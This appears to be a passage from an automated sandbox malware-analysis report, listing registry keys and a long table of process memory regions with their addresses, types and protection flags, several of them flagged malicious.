HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 78 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2561000
trusted library allocation
page read and write
malicious
270D000
trusted library allocation
page read and write
malicious
250D000
trusted library allocation
page read and write
malicious
2361000
trusted library allocation
page read and write
malicious
416000
system
page execute and read and write
malicious
3AF0000
heap
page read and write
361D000
heap
page read and write
25F1000
trusted library allocation
page read and write
1236F000
trusted library allocation
page read and write
1C2E7000
heap
page read and write
455B000
heap
page read and write
409C000
heap
page read and write
55DE000
stack
page read and write
367A000
trusted library allocation
page read and write
353A000
trusted library allocation
page read and write
1C2F2000
heap
page read and write
3667000
heap
page read and write
7FE8B2F0000
trusted library allocation
page execute and read and write
2499000
trusted library allocation
page read and write
7FE89BFD000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
481000
heap
page read and write
258000
heap
page read and write
3C0000
direct allocation
page read and write
2B46000
trusted library allocation
page read and write
43A2000
heap
page read and write
3128000
heap
page read and write
330000
heap
page read and write
403000
system
page execute and read and write
4F86000
heap
page read and write
408000
heap
page read and write
3B6D000
heap
page read and write
353D000
trusted library allocation
page read and write
2E80000
heap
page read and write
7FE89C50000
trusted library allocation
page read and write
7FE898DC000
trusted library allocation
page execute and read and write
468000
heap
page read and write
26AE000
trusted library allocation
page read and write
30DB000
trusted library allocation
page read and write
540000
heap
page read and write
1A3DA000
stack
page read and write
4331000
heap
page read and write
2E80000
heap
page read and write
3AF7000
heap
page read and write
4039000
heap
page read and write
574C000
heap
page read and write
409D000
heap
page read and write
409000
heap
page read and write
3B6D000
heap
page read and write
360C000
heap
page read and write
361D000
heap
page read and write
3E50000
heap
page read and write
3AF0000
heap
page read and write
1C18E000
stack
page read and write
1F26000
heap
page read and write
2B52000
trusted library allocation
page read and write
439E000
heap
page read and write
342F000
trusted library allocation
page read and write
2623000
trusted library allocation
page read and write
40B2000
heap
page read and write
130000
direct allocation
page read and write
2700000
remote allocation
page read and write
361D000
heap
page read and write
248D000
trusted library allocation
page read and write
378E000
heap
page read and write
420D000
heap
page read and write
39B0000
heap
page read and write
170000
trusted library allocation
page read and write
40D000
heap
page read and write
52BE000
stack
page read and write
43A5000
heap
page read and write
3598000
heap
page read and write
3B6D000
heap
page read and write
2ED0000
trusted library allocation
page read and write
3B6D000
heap
page read and write
353A000
trusted library allocation
page read and write
2EAD000
direct allocation
page read and write
409000
heap
page read and write
7FE89C18000
trusted library allocation
page read and write
364000
heap
page read and write
5839000
heap
page read and write
10000
heap
page read and write
1C303000
heap
page read and write
1B00C000
stack
page read and write
2E80000
heap
page read and write
3EE000
heap
page read and write
361D000
heap
page read and write
3AF0000
heap
page read and write
369F000
trusted library allocation
page read and write
361D000
heap
page read and write
375C000
heap
page read and write
30D3000
heap
page read and write
23F9000
trusted library allocation
page read and write
501E000
stack
page read and write
7FE8989B000
trusted library allocation
page read and write
361D000
heap
page read and write
3F57000
direct allocation
page read and write
3F60000
direct allocation
page read and write
2775000
trusted library allocation
page read and write
409000
heap
page read and write
4331000
heap
page read and write
3E50000
heap
page read and write
2930000
trusted library allocation
page execute
3E50000
direct allocation
page read and write
369F000
trusted library allocation
page read and write
3129000
heap
page read and write
3E60000
direct allocation
page read and write
43FF000
heap
page read and write
35A7000
heap
page read and write
7FE89A33000
trusted library allocation
page read and write
5821000
heap
page read and write
239F000
stack
page read and write
3E50000
direct allocation
page read and write
493D000
heap
page read and write
495000
heap
page read and write
44E0000
trusted library allocation
page read and write
30CF000
heap
page read and write
7FE8B430000
trusted library allocation
page read and write
2361000
trusted library allocation
page read and write
361D000
heap
page read and write
7FE8988D000
trusted library allocation
page execute and read and write
418000
heap
page read and write
4779000
heap
page read and write
1CB0000
trusted library allocation
page read and write
4F5000
heap
page read and write
40C000
heap
page read and write
361D000
heap
page read and write
39B0000
heap
page read and write
3B6D000
heap
page read and write
361D000
heap
page read and write
39B0000
heap
page read and write
966000
heap
page read and write
2634000
trusted library allocation
page read and write
5EEF000
stack
page read and write
57E6000
heap
page read and write
1C2E0000
heap
page read and write
353A000
trusted library allocation
page read and write
1A5BF000
stack
page read and write
26B6000
trusted library allocation
page read and write
12371000
trusted library allocation
page read and write
52E000
heap
page read and write
433F000
heap
page read and write
4484000
heap
page read and write
415000
system
page execute and read and write
448F000
heap
page read and write
1AC63000
heap
page read and write
1B550000
heap
page read and write
369F000
trusted library allocation
page read and write
1C1B0000
heap
page read and write
1C7000
heap
page read and write
3598000
heap
page read and write
3E60000
direct allocation
page read and write
3AEF000
heap
page read and write
375C000
heap
page read and write
31D0000
trusted library allocation
page read and write
2B6E000
trusted library allocation
page read and write
3B6D000
heap
page read and write
3BF1000
direct allocation
page read and write
361D000
heap
page read and write
353D000
trusted library allocation
page read and write
39B0000
heap
page read and write
3B6D000
heap
page read and write
3E50000
heap
page read and write
1A5C0000
heap
page read and write
5FEE000
stack
page read and write
353A000
trusted library allocation
page read and write
587F000
heap
page read and write
4399000
heap
page read and write
2E80000
heap
page read and write
7FE8B390000
trusted library allocation
page read and write
3AF0000
heap
page read and write
1AD9F000
stack
page read and write
450000
trusted library allocation
page read and write
440000
trusted library allocation
page execute and read and write
39B0000
heap
page read and write
18D000
heap
page read and write
43A9000
heap
page read and write
2A7000
trusted library allocation
page execute and read and write
361D000
heap
page read and write
2B7D000
trusted library allocation
page read and write
39B000
heap
page read and write
1A69F000
heap
page read and write
4054000
heap
page read and write
27B2000
trusted library allocation
page read and write
4058000
heap
page read and write
3419000
trusted library allocation
page read and write
30D4000
heap
page read and write
5B02000
heap
page read and write
3B6D000
heap
page read and write
7FE89882000
trusted library allocation
page read and write
7FE8B3F0000
trusted library allocation
page read and write
2EB0000
trusted library allocation
page read and write
3B6D000
heap
page read and write
485000
heap
page read and write
439D000
heap
page read and write
312F000
heap
page read and write
361D000
heap
page read and write
39B0000
heap
page read and write
39B0000
heap
page read and write
382D000
heap
page read and write
27A3000
trusted library allocation
page read and write
382000
heap
page read and write
30E8000
heap
page read and write
7FE89A20000
trusted library allocation
page read and write
490B000
heap
page read and write
2B7E000
trusted library allocation
page read and write
3589000
trusted library allocation
page read and write
256E000
trusted library allocation
page read and write
2E80000
heap
page read and write
2E80000
heap
page read and write
1AC04000
heap
page read and write
4488000
heap
page read and write
310000
heap
page read and write
2B4F000
trusted library allocation
page read and write
473000
heap
page read and write
404E000
heap
page read and write
2E80000
heap
page read and write
4549000
heap
page read and write
5729000
heap
page read and write
378E000
heap
page read and write
404B000
heap
page read and write
1FE000
heap
page read and write
1C306000
heap
page read and write
361D000
heap
page read and write
3C60000
direct allocation
page read and write
361D000
heap
page read and write
27AD000
trusted library allocation
page read and write
43A5000
heap
page read and write
448B000
heap
page read and write
37AE000
heap
page read and write
7FE89A62000
trusted library allocation
page read and write
3E50000
heap
page read and write
1A51A000
stack
page read and write
3091000
heap
page read and write
361D000
heap
page read and write
3B6D000
heap
page read and write
38D000
heap
page read and write
4770000
heap
page read and write
4779000
heap
page read and write
4054000
heap
page read and write
4DD0000
heap
page read and write
367A000
trusted library allocation
page read and write
3BF1000
direct allocation
page read and write
139000
heap
page read and write
3F40000
direct allocation
page read and write
3AF0000
heap
page read and write
2E80000
heap
page read and write
361D000
heap
page read and write
40C3000
trusted library allocation
page read and write
414000
heap
page read and write
3F57000
direct allocation
page read and write
3F40000
direct allocation
page read and write
1C240000
heap
page read and write
56FA000
heap
page read and write
44D6000
heap
page read and write
7FE89A3C000
trusted library allocation
page read and write
39B0000
heap
page read and write
367A000
trusted library allocation
page read and write
3E50000
heap
page read and write
447B000
heap
page read and write
361D000
heap
page read and write
6D2000
heap
page read and write
2448000
trusted library allocation
page read and write
40A6000
heap
page read and write
27AD000
trusted library allocation
page read and write
3BF7000
direct allocation
page read and write
2E80000
heap
page read and write
2130000
heap
page execute and read and write
366000
heap
page read and write
7FE8B2D7000
trusted library allocation
page read and write
39B0000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
242000
stack
page read and write
4934000
heap
page read and write
3A0000
direct allocation
page read and write
361D000
heap
page read and write
289000
heap
page read and write
491A000
heap
page read and write
3F57000
direct allocation
page read and write
1B3E0000
heap
page read and write
4058000
heap
page read and write
3220000
heap
page read and write
300000
heap
page read and write
120000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
382E000
heap
page read and write
4371000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
5850000
heap
page read and write
2DD0000
direct allocation
page read and write
4399000
heap
page read and write
281B000
stack
page read and write
4543000
heap
page read and write
7FE8993C000
trusted library allocation
page execute and read and write
4701000
heap
page read and write
495B000
heap
page read and write
3A7F000
stack
page read and write
1B19B000
stack
page read and write
3F54000
direct allocation
page read and write
27A9000
trusted library allocation
page read and write
3091000
heap
page read and write
6DF000
heap
page read and write
D0000
heap
page read and write
27A7000
trusted library allocation
page read and write
41C0000
heap
page read and write
DFE000
stack
page read and write
4401000
heap
page read and write
4E7000
heap
page read and write
2A2000
trusted library allocation
page read and write
170000
heap
page read and write
579F000
heap
page read and write
3E50000
heap
page read and write
27D5000
trusted library allocation
page read and write
3BA0000
trusted library allocation
page read and write
10000
heap
page read and write
427000
heap
page read and write
61B000
heap
page read and write
D20000
heap
page read and write
4946000
heap
page read and write
490000
heap
page read and write
3E50000
heap
page read and write
57CE000
heap
page read and write
369F000
trusted library allocation
page read and write
3AF0000
heap
page read and write
7FE8B133000
trusted library allocation
page read and write
7FE8B206000
trusted library allocation
page execute and read and write
53F000
heap
page read and write
353D000
trusted library allocation
page read and write
5735000
heap
page read and write
405C000
heap
page read and write
507E000
stack
page read and write
403F000
heap
page read and write
39B0000
heap
page read and write
353A000
trusted library allocation
page read and write
369F000
trusted library allocation
page read and write
1E90000
heap
page read and write
2654000
trusted library allocation
page read and write
124D4000
trusted library allocation
page read and write
4915000
heap
page read and write
359F000
heap
page read and write
3C00000
direct allocation
page read and write
2689000
trusted library allocation
page read and write
4347000
heap
page read and write
3E50000
heap
page read and write
426000
heap
page read and write
5AEE000
stack
page read and write
1DD0000
direct allocation
page read and write
405C000
heap
page read and write
E6F000
stack
page read and write
415000
heap
page read and write
27AB000
trusted library allocation
page read and write
131000
heap
page read and write
30B6000
heap
page read and write
367A000
trusted library allocation
page read and write
4038000
heap
page read and write
4FA000
heap
page read and write
42E6000
heap
page read and write
28D000
trusted library allocation
page execute and read and write
39B0000
heap
page read and write
43A6000
heap
page read and write
401000
unkown
page execute read
404B000
heap
page read and write
7FE89A64000
trusted library allocation
page read and write
20000
heap
page read and write
4946000
heap
page read and write
3F54000
direct allocation
page read and write
2080000
trusted library allocation
page execute read
361D000
heap
page read and write
2240000
heap
page read and write
39B0000
heap
page read and write
361D000
heap
page read and write
430E000
heap
page read and write
27B2000
trusted library allocation
page read and write
3E50000
heap
page read and write
1C05F000
stack
page read and write
1A49F000
stack
page read and write
353D000
trusted library allocation
page read and write
409A000
heap
page read and write
27AD000
trusted library allocation
page read and write
3E50000
heap
page read and write
367A000
trusted library allocation
page read and write
494000
heap
page read and write
405C000
heap
page read and write
27DF000
trusted library allocation
page read and write
18D000
heap
page read and write
2E50000
heap
page read and write
4399000
heap
page read and write
495000
heap
page read and write
411C000
heap
page read and write
2B6F000
trusted library allocation
page read and write
2DD0000
direct allocation
page read and write
4210000
heap
page read and write
3E50000
heap
page read and write
53CF000
heap
page read and write
4209000
heap
page read and write
3745000
heap
page read and write
44D000
heap
page read and write
3B6D000
heap
page read and write
3B5C000
heap
page read and write
7FE89C20000
trusted library allocation
page read and write
361D000
heap
page read and write
3B6D000
heap
page read and write
1B8000
stack
page read and write
787000
heap
page read and write
495000
heap
page read and write
27D5000
trusted library allocation
page read and write
353A000
trusted library allocation
page read and write
349000
heap
page read and write
4DE000
heap
page read and write
3AF0000
heap
page read and write
412000
heap
page read and write
374D000
heap
page read and write
7FE89893000
trusted library allocation
page read and write
51B000
heap
page read and write
361D000
heap
page read and write
39B0000
heap
page read and write
4E3000
heap
page read and write
455A000
heap
page read and write
10000
heap
page read and write
2D30000
trusted library allocation
page read and write
3E50000
heap
page read and write
1AD0000
heap
page read and write
49DD000
stack
page read and write
7FE89936000
trusted library allocation
page read and write
16C000
heap
page read and write
1C46000
heap
page read and write
5815000
heap
page read and write
439C000
heap
page read and write
4E39000
heap
page read and write
247000
heap
page read and write
448B000
heap
page read and write
1C222000
heap
page read and write
47A000
heap
page read and write
353D000
trusted library allocation
page read and write
7FE89B40000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
27AD000
trusted library allocation
page read and write
4B6000
heap
page read and write
1C50F000
stack
page read and write
39B0000
heap
page read and write
1C4BE000
stack
page read and write
4201000
heap
page read and write
3B6D000
heap
page read and write
3AF0000
heap
page read and write
3E7000
heap
page read and write
449C000
heap
page read and write
3AF0000
heap
page read and write
40AB000
heap
page read and write
4901000
heap
page read and write
3E50000
heap
page read and write
23F0000
trusted library allocation
page read and write
2E80000
heap
page read and write
361D000
heap
page read and write
1BF0000
trusted library allocation
page read and write
40A9000
heap
page read and write
405F000
heap
page read and write
495000
heap
page read and write
8B000
stack
page read and write
317E000
trusted library allocation
page read and write
448F000
heap
page read and write
39F000
heap
page read and write
27D000
trusted library allocation
page execute and read and write
3E50000
heap
page read and write
3AF0000
heap
page read and write
3B6D000
heap
page read and write
3B6D000
heap
page read and write
383000
direct allocation
page read and write
4054000
heap
page read and write
3B6D000
heap
page read and write
361D000
heap
page read and write
3E50000
heap
page read and write
3900000
direct allocation
page read and write
173000
trusted library allocation
page execute and read and write
2EAA000
direct allocation
page read and write
3BF7000
direct allocation
page read and write
382F000
heap
page read and write
121000
heap
page read and write
43A9000
heap
page read and write
7FE89C60000
trusted library allocation
page read and write
1C83D000
stack
page read and write
39B0000
heap
page read and write
2E80000
heap
page read and write
3AF0000
heap
page read and write
3B6D000
heap
page read and write
405C000
heap
page read and write
39B0000
heap
page read and write
7FE89B9D000
trusted library allocation
page read and write
45C6000
heap
page read and write
361D000
heap
page read and write
27AD000
trusted library allocation
page read and write
2D11000
trusted library allocation
page read and write
47B000
heap
page read and write
4054000
heap
page read and write
3AF0000
heap
page read and write
548000
heap
page read and write
515F000
stack
page read and write
39B0000
heap
page read and write
409C000
heap
page read and write
3410000
trusted library allocation
page read and write
3B6D000
heap
page read and write
4058000
heap
page read and write
492000
heap
page read and write
7FE8B1D0000
trusted library allocation
page read and write
43A9000
heap
page read and write
3B6D000
heap
page read and write
361D000
heap
page read and write
57B7000
heap
page read and write
4779000
heap
page read and write
360C000
heap
page read and write
1BE000
heap
page read and write
39F000
direct allocation
page read and write
30B6000
heap
page read and write
43AB000
heap
page read and write
7FE89A50000
trusted library allocation
page execute and read and write
1C213000
heap
page read and write
3AF0000
heap
page read and write
27C8000
trusted library allocation
page read and write
3145000
heap
page read and write
3280000
heap
page read and write
317A000
trusted library allocation
page read and write
3BB5000
trusted library allocation
page read and write
450000
heap
page read and write
361D000
heap
page read and write
3B6E000
heap
page read and write
39B0000
heap
page read and write
2A5000
trusted library allocation
page execute and read and write
2E80000
heap
page read and write
24C0000
heap
page read and write
400000
heap
page read and write
3C00000
direct allocation
page read and write
1B034000
heap
page read and write
424000
heap
page read and write
2B75000
trusted library allocation
page read and write
312B000
heap
page read and write
361D000
heap
page read and write
353D000
trusted library allocation
page read and write
3804000
heap
page read and write
27DF000
trusted library allocation
page read and write
495000
heap
page read and write
7FE89966000
trusted library allocation
page execute and read and write
2B7B000
trusted library allocation
page read and write
33A0000
trusted library allocation
page read and write
3AF0000
heap
page read and write
7FE8B328000
trusted library allocation
page read and write
2D10000
trusted library allocation
page read and write
216000
heap
page read and write
418000
heap
page read and write
7FE8B420000
trusted library allocation
page read and write
7FE8B12D000
trusted library allocation
page execute and read and write
3AE8000
heap
page read and write
1C9CF000
stack
page read and write
39DD000
direct allocation
page read and write
27C000
stack
page read and write
56B3000
heap
page read and write
2560000
heap
page read and write
2E0000
trusted library allocation
page read and write
361D000
heap
page read and write
3B0000
heap
page read and write
353A000
trusted library allocation
page read and write
4915000
heap
page read and write
7FFFFF82000
trusted library allocation
page readonly
24B6000
trusted library allocation
page read and write
476A000
heap
page read and write
2481000
trusted library allocation
page read and write
261F000
trusted library allocation
page read and write
3AF0000
heap
page read and write
697000
heap
page read and write
3E0000
heap
page read and write
58BA000
heap
page read and write
4775000
heap
page read and write
1C890000
heap
page read and write
2E80000
heap
page read and write
27B2000
trusted library allocation
page read and write
420C000
heap
page read and write
361D000
heap
page read and write
750000
heap
page execute and read and write
3FC0000
direct allocation
page read and write
249E000
stack
page read and write
2B54000
trusted library allocation
page read and write
53C0000
heap
page read and write
427000
heap
page read and write
46C000
heap
page read and write
4062000
heap
page read and write
1C1AF000
stack
page read and write
43A5000
heap
page read and write
3900000
direct allocation
page read and write
25B000
heap
page read and write
3B6D000
heap
page read and write
7FE8B123000
trusted library allocation
page execute and read and write
39B0000
heap
page read and write
3750000
heap
page read and write
2130000
heap
page read and write
2E80000
heap
page read and write
3129000
heap
page read and write
2E80000
heap
page read and write
485000
heap
page read and write
455A000
heap
page read and write
4549000
heap
page read and write
7FE8B17C000
trusted library allocation
page execute and read and write
353A000
trusted library allocation
page read and write
239E000
stack
page read and write | page guard
361E000
heap
page read and write
3BF4000
direct allocation
page read and write
513000
trusted library allocation
page read and write
353A000
trusted library allocation
page read and write
4EB000
heap
page read and write
3B6D000
heap
page read and write
3AE8000
heap
page read and write
1AB08000
stack
page read and write
1B2000
trusted library allocation
page read and write
1B28E000
direct allocation
page read and write
5410000
heap
page read and write
39CF000
stack
page read and write
57FE000
heap
page read and write
3B6D000
heap
page read and write
4954000
heap
page read and write
43B000
heap
page read and write
4777000
heap
page read and write
361D000
heap
page read and write
478000
heap
page read and write
7FFFFF85000
trusted library allocation
page execute read
449C000
heap
page read and write
3B6D000
heap
page read and write
361D000
heap
page read and write
2F4000
heap
page read and write
4054000
heap
page read and write
44DF000
heap
page read and write
25E6000
trusted library allocation
page read and write
27A5000
trusted library allocation
page read and write
405F000
heap
page read and write
43A6000
heap
page read and write
572C000
heap
page read and write
27AB000
trusted library allocation
page read and write
2E0000
heap
page read and write
255000
heap
page read and write
26F1000
trusted library allocation
page read and write
4096000
heap
page read and write
1CAEE000
stack
page read and write
1C80C000
stack
page read and write
1C244000
heap
page read and write
7FE8B302000
trusted library allocation
page read and write
1B460000
heap
page read and write
40C000
heap
page read and write
4C9000
heap
page read and write
361D000
heap
page read and write
267000
heap
page read and write
7FE89A37000
trusted library allocation
page read and write
3AF0000
heap
page read and write
43A9000
heap
page read and write
1DC000
stack
page read and write
361D000
heap
page read and write
288000
trusted library allocation
page read and write
97000
heap
page read and write
39B0000
heap
page read and write
495000
heap
page read and write
493B000
heap
page read and write
704000
heap
page read and write
39DD000
direct allocation
page read and write
4371000
heap
page read and write
3C0000
trusted library allocation
page execute and read and write
27B2000
trusted library allocation
page read and write
5690000
heap
page read and write
22E0000
trusted library allocation
page execute read
3AF0000
heap
page read and write
408D000
heap
page read and write
7FE8B415000
trusted library allocation
page read and write
3F51000
direct allocation
page read and write
1BB000
trusted library allocation
page execute and read and write
3AF0000
heap
page read and write
3BA0000
trusted library allocation
page read and write
448F000
heap
page read and write
58DE000
heap
page read and write
361D000
heap
page read and write
353D000
trusted library allocation
page read and write
420000
direct allocation
page read and write
30CD000
heap
page read and write
2E80000
heap
page read and write
375C000
heap
page read and write
361D000
heap
page read and write
4F0E000
stack
page read and write | page guard
1A2000
trusted library allocation
page read and write
1A5BC000
stack
page read and write
43C000
heap
page read and write
4030000
heap
page read and write
190000
heap
page read and write
130000
heap
page read and write
3619000
heap
page read and write
466000
heap
page read and write
270000
trusted library allocation
page read and write
1E70000
heap
page read and write
26ED000
trusted library allocation
page read and write
47A000
heap
page read and write
4AB000
unkown
page readonly
2E80000
heap
page read and write
445F000
heap
page read and write
2B7A000
trusted library allocation
page read and write
4038000
heap
page read and write
361D000
heap
page read and write
361D000
heap
page read and write
1C89E000
stack
page read and write
495000
heap
page read and write
353A000
trusted library allocation
page read and write
7FE8B310000
trusted library allocation
page execute and read and write
2B70000
trusted library allocation
page read and write
4062000
heap
page read and write
570000
heap
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
405F000
heap
page read and write
500000
heap
page read and write
3D0000
trusted library allocation
page read and write
5BF000
heap
page read and write
4537000
heap
page read and write
2EAD000
direct allocation
page read and write
3B6D000
heap
page read and write
438000
trusted library allocation
page read and write
3AF0000
heap
page read and write
360C000
heap
page read and write
330000
heap
page read and write
455A000
heap
page read and write
3128000
heap
page read and write
590000
direct allocation
page read and write
27D5000
trusted library allocation
page read and write
3E50000
heap
page read and write
55B000
heap
page read and write
2645000
trusted library allocation
page read and write
27AE000
trusted library allocation
page read and write
3F0000
heap
page read and write
3463000
direct allocation
page read and write
3E50000
heap
page read and write
495A000
heap
page read and write
41C0000
heap
page read and write
4933000
heap
page read and write
367A000
trusted library allocation
page read and write
490000
heap
page read and write
4944000
heap
page read and write
1A8F9000
stack
page read and write
3B6B000
heap
page read and write
27B2000
trusted library allocation
page read and write
3BF4000
direct allocation
page read and write
4915000
heap
page read and write
40A4000
heap
page read and write
3FC0000
direct allocation
page read and write
267000
heap
page read and write
1C300000
heap
page read and write
6C0000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
3AF0000
heap
page read and write
353D000
trusted library allocation
page read and write
7FE89B75000
trusted library allocation
page read and write
2680000
remote allocation
page read and write
7FE89BB0000
trusted library allocation
page read and write
4779000
heap
page read and write
353A000
trusted library allocation
page read and write
3430000
direct allocation
page read and write
520000
heap
page read and write
4936000
heap
page read and write
4542000
heap
page read and write
308000
heap
page read and write
361D000
heap
page read and write
1C48E000
stack
page read and write
2F40000
heap
page read and write
27AD000
trusted library allocation
page read and write
470000
heap
page read and write
1DE3000
direct allocation
page read and write
3AF0000
heap
page read and write
455A000
heap
page read and write
2CF000
heap
page read and write
1D10000
trusted library allocation
page read and write
4DA000
heap
page read and write
411C000
heap
page read and write
4370000
heap
page read and write
7FE89A80000
trusted library allocation
page read and write
400000
unkown
page readonly
3B6D000
heap
page read and write
3E50000
heap
page read and write
3AF000
heap
page read and write
4546000
heap
page read and write
1A4FE000
heap
page execute and read and write
3E50000
heap
page read and write
4A5D000
stack
page read and write
3AF0000
heap
page read and write
4370000
heap
page read and write
51FE000
stack
page read and write
23E8000
trusted library allocation
page read and write
2700000
trusted library allocation
page read and write
367A000
trusted library allocation
page read and write
361D000
heap
page read and write
338000
heap
page read and write
367A000
trusted library allocation
page read and write
268D000
trusted library allocation
page read and write
42E0000
heap
page read and write
7FE89883000
trusted library allocation
page execute and read and write
39B0000
heap
page read and write
317E000
trusted library allocation
page read and write
4058000
heap
page read and write
37E000
heap
page read and write
367A000
trusted library allocation
page read and write
543E000
stack
page read and write
1B1BF000
stack
page read and write
3AF0000
heap
page read and write
27B4000
trusted library allocation
page read and write
439A000
heap
page read and write
24000
heap
page read and write
430000
trusted library allocation
page read and write
134000
heap
page read and write
3E50000
heap
page read and write
409000
heap
page read and write
405F000
heap
page read and write
3BE0000
direct allocation
page read and write
10000
heap
page read and write
577C000
heap
page read and write
4B6000
heap
page read and write
2C0000
heap
page read and write
4B6000
heap
page read and write
36E000
heap
page read and write
3E50000
heap
page read and write
27A5000
trusted library allocation
page read and write
3B6D000
heap
page read and write
400000
unkown
page readonly
4918000
heap
page read and write
378E000
heap
page read and write
2491000
trusted library allocation
page read and write
4348000
heap
page read and write
493F000
stack
page read and write
2B7A000
trusted library allocation
page read and write
492000
heap
page read and write
2DF000
heap
page read and write
3B6D000
heap
page read and write
660000
heap
page read and write
3B6D000
heap
page read and write
408000
heap
page read and write
36A0000
trusted library allocation
page read and write
2F9000
heap
page read and write
420F000
heap
page read and write
43A2000
heap
page read and write
56F0000
heap
page read and write
1A489000
stack
page read and write
3E50000
direct allocation
page read and write
3B6D000
heap
page read and write
4484000
heap
page read and write
3AF0000
heap
page read and write
25B000
heap
page read and write
4AB0000
heap
page execute and read and write
44DF000
heap
page read and write
24D1000
trusted library allocation
page read and write
3B5C000
heap
page read and write
476B000
heap
page read and write
374A000
heap
page read and write
1B0CF000
stack
page read and write
497000
heap
page read and write
3B6D000
heap
page read and write
59FE000
stack
page read and write
2B45000
trusted library allocation
page read and write
2E80000
heap
page read and write
3A0000
heap
page execute and read and write
20000
heap
page read and write
1C10E000
stack
page read and write
3029000
trusted library allocation
page read and write
3AF0000
heap
page read and write
420B000
heap
page read and write
54EE000
stack
page read and write
5D0E000
stack
page read and write
3BE0000
direct allocation
page read and write
4946000
heap
page read and write
2DF000
stack
page read and write
58A3000
heap
page read and write
4309000
heap
page read and write
27C8000
trusted library allocation
page read and write
3B6D000
heap
page read and write
361D000
heap
page read and write
38D000
direct allocation
page read and write
26EC000
stack
page read and write
1A5C6000
heap
page read and write
1B030000
heap
page read and write
37B6000
heap
page read and write
3598000
heap
page read and write
3900000
direct allocation
page read and write
4F0F000
stack
page read and write
7FE89B10000
trusted library allocation
page read and write
25E9000
trusted library allocation
page read and write
409000
heap
page read and write
26C4000
trusted library allocation
page read and write
387000
direct allocation
page read and write
313E000
heap
page read and write
3E50000
heap
page read and write
2DD0000
direct allocation
page read and write
644000
heap
page read and write
2B74000
trusted library allocation
page read and write
20000
heap
page read and write
39B0000
heap
page read and write
3BA0000
trusted library allocation
page read and write
2837000
trusted library allocation
page read and write
3053000
trusted library allocation
page read and write
40A9000
heap
page read and write
25B5000
heap
page read and write
4946000
heap
page read and write
196000
heap
page read and write
27DF000
trusted library allocation
page read and write
369F000
trusted library allocation
page read and write
3745000
heap
page read and write
44DA000
heap
page read and write
5100000
heap
page read and write
516000
trusted library allocation
page read and write
361D000
heap
page read and write
7FE89A84000
trusted library allocation
page read and write
7FE89930000
trusted library allocation
page read and write
3AF0000
heap
page read and write
27DF000
trusted library allocation
page read and write
44DF000
heap
page read and write
2E80000
heap
page read and write
2F0000
heap
page read and write
3E50000
heap
page read and write
CDE000
stack
page read and write
411A000
heap
page read and write
3AF0000
direct allocation
page read and write
427000
heap
page read and write
3751000
heap
page read and write
4165000
heap
page read and write
25EE000
trusted library allocation
page read and write
469000
heap
page read and write
353A000
trusted library allocation
page read and write
353A000
trusted library allocation
page read and write
2B43000
trusted library allocation
page read and write
5770000
heap
page read and write
4F68000
heap
page read and write
124D6000
trusted library allocation
page read and write
499F000
stack
page read and write
4370000
heap
page read and write
1C20B000
heap
page read and write
235F000
stack
page read and write
4A4000
heap
page read and write
7FE8B2D3000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
2E80000
heap
page read and write
39B000
direct allocation
page read and write
408C000
heap
page read and write
3BE0000
direct allocation
page read and write
433000
heap
page read and write
367A000
trusted library allocation
page read and write
43AC000
heap
page read and write
2B73000
trusted library allocation
page read and write
27DF000
trusted library allocation
page read and write
50D000
stack
page read and write
3155000
trusted library allocation
page read and write
361D000
heap
page read and write
3F0000
heap
page read and write
3B6D000
heap
page read and write
369F000
trusted library allocation
page read and write
3E50000
heap
page read and write
4043000
heap
page read and write
379000
heap
page read and write
24FF000
trusted library allocation
page read and write
4098000
heap
page read and write
56EE000
heap
page read and write
1AC58000
heap
page read and write
2454000
trusted library allocation
page read and write
30B6000
heap
page read and write
2B45000
trusted library allocation
page read and write
427000
heap
page read and write
3B6D000
heap
page read and write
960000
heap
page read and write
4B10000
heap
page execute and read and write
1AE7C000
stack
page read and write
2B47000
trusted library allocation
page read and write
361D000
heap
page read and write
27DF000
trusted library allocation
page read and write
7FE8B3B0000
trusted library allocation
page read and write
41BA000
heap
page read and write
4770000
heap
page read and write
2E80000
heap
page read and write
6A6000
heap
page read and write
24AE000
trusted library allocation
page read and write
34F0000
trusted library allocation
page read and write
1A625000
heap
page read and write
2421000
trusted library allocation
page read and write
1BFFD000
stack
page read and write
10000
heap
page read and write
33DD000
trusted library allocation
page read and write
375C000
heap
page read and write
27B3000
trusted library allocation
page read and write
7FE8B460000
trusted library allocation
page read and write
4941000
heap
page read and write
2A4B000
stack
page read and write
39DD000
direct allocation
page read and write
382D000
heap
page read and write
4331000
heap
page read and write
353A000
trusted library allocation
page read and write
5793000
heap
page read and write
40A1000
heap
page read and write
25EB000
heap
page read and write
3AE8000
heap
page read and write
3AF0000
heap
page read and write
39B0000
heap
page read and write
4F3D000
stack
page read and write
D4000
heap
page read and write
342A000
trusted library allocation
page read and write
369F000
trusted library allocation
page read and write
3140000
trusted library allocation
page read and write
4910000
heap
page read and write
4371000
heap
page read and write
4062000
heap
page read and write
7FE89C30000
trusted library allocation
page read and write
3457000
direct allocation
page read and write
4919000
heap
page read and write
2606000
trusted library allocation
page read and write
3B6D000
heap
page read and write
4347000
heap
page read and write
37B6000
heap
page read and write
3131000
heap
page read and write
361D000
heap
page read and write
440000
direct allocation
page read and write
4095000
heap
page read and write
495A000
heap
page read and write
353A000
trusted library allocation
page read and write
44E0000
trusted library allocation
page read and write
3E50000
heap
page read and write
3F40000
direct allocation
page read and write
640000
heap
page read and write
7FE89BE4000
trusted library allocation
page read and write
405F000
heap
page read and write
369F000
trusted library allocation
page read and write
1DD7000
direct allocation
page read and write
353D000
trusted library allocation
page read and write
26D2000
trusted library allocation
page read and write
4E35000
heap
page read and write
5CBE000
stack
page read and write
41C0000
heap
page read and write
411A000
heap
page read and write
420000
heap
page read and write
361D000
heap
page read and write
124D8000
trusted library allocation
page read and write
539000
heap
page read and write
